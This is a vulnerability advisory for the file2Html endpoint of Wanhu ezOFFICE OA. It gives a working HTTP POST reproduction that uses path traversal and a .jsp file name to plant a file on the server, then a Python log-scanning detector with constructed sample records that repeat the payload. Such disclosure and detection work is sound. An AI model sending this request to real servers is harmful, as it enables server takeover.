Vulnerability description
万户OA (Office Automation) is an enterprise-grade collaborative office management suite intended to give organizations a complete office-automation solution. The file2Html interface of 万户ezOFFICE contains an arbitrary remote file download vulnerability: an attacker can use it to download an arbitrary file onto the target server, which can lead to the attacker gaining control of the server.
Reproduction
- Download a file; the fileName parameter is limited to 13 bytes.
POST /defaultroot/yzConvertFile/file2Html.controller HTTP/1.1
Host: xxxxx
Content-Length: 144
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: LocLan=zh_CN; OASESSIONID=30170ED4FFE28967E72103EFFDFE11FA
Connection: close

fileName=1111111111112.jsp&path=../platform/portal/&
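For defenders, the request above gives a clear pattern to alert on: a POST to the file2Html.controller endpoint whose path parameter climbs out of the conversion directory, or whose fileName carries a server-executable extension. The following detection helper is an added example written for this page; it is not code from the advisory or from the vendor. It assumes a reverse proxy or WAF that records POST bodies as a tab-separated field (the log format, field order and the sample records are all constructed here), and it only checks parameters that already appear in the request shown.

```python
"""Detection helper (added example, not from the advisory): flag requests to the
ezOFFICE file2Html.controller endpoint that show the traversal-plus-JSP pattern.
The log format and field names are assumptions; adapt them to what your proxy
or WAF actually records."""
from urllib.parse import parse_qs, unquote, urlsplit

ENDPOINT_SUFFIX = "/yzConvertFile/file2Html.controller"
# Extensions a servlet container would execute if the file lands under the webroot.
EXEC_EXTENSIONS = (".jsp", ".jspx", ".jspf")

# Constructed sample records (assumption: the proxy logs the POST body as the last
# tab-separated field). These are not real log lines from any system.
SAMPLE_LOG = """\
10.0.0.5\tPOST\t/defaultroot/yzConvertFile/file2Html.controller\tfileName=1111111111112.jsp&path=../platform/portal/&
10.0.0.6\tPOST\t/defaultroot/yzConvertFile/file2Html.controller\tfileName=report.docx&path=convert/tmp/
10.0.0.7\tGET\t/defaultroot/index.jsp\t-
10.0.0.8\tPOST\t/defaultroot/yzConvertFile/file2Html.controller\tfileName=x.doc&path=..%2F..%2Fwebapps%2F
"""


def parse_record(line):
    """Split one constructed log line into its four fields."""
    ip, method, url, body = line.rstrip("\n").split("\t", 3)
    return {"ip": ip, "method": method, "url": url, "body": body}


def analyse_request(rec):
    """Return the list of reasons a request is suspicious (empty when benign)."""
    reasons = []
    if not urlsplit(rec["url"]).path.endswith(ENDPOINT_SUFFIX):
        return reasons  # other endpoints are out of scope for this rule
    params = parse_qs(rec["body"], keep_blank_values=True)
    file_name = params.get("fileName", [""])[0]
    # parse_qs decodes once; a second unquote catches double-encoded traversal.
    path = unquote(params.get("path", [""])[0])
    segments = path.replace("\\", "/").split("/")
    if ".." in segments:
        reasons.append("path traversal in 'path'")
    if path.startswith(("/", "\\")) or (len(path) > 1 and path[1] == ":"):
        reasons.append("absolute 'path'")
    if file_name.lower().endswith(EXEC_EXTENSIONS):
        reasons.append("server-executable extension in 'fileName'")
    return reasons


def scan_log(text):
    """Return [(client_ip, reasons)] for every record that trips at least one rule."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        reasons = analyse_request(rec)
        if reasons:
            hits.append((rec["ip"], reasons))
    return hits


if __name__ == "__main__":
    for ip, reasons in scan_log(SAMPLE_LOG):
        print(ip, "->", "; ".join(reasons))
```

Run against the constructed sample, the first and fourth records are reported (traversal in path, and in the first case also the .jsp file name), while the ordinary conversion request and the unrelated GET are left alone. Detection of this kind is a stopgap for visibility; the durable fix is to apply the vendor's patch and to have the endpoint reject any path value that resolves outside its conversion directory.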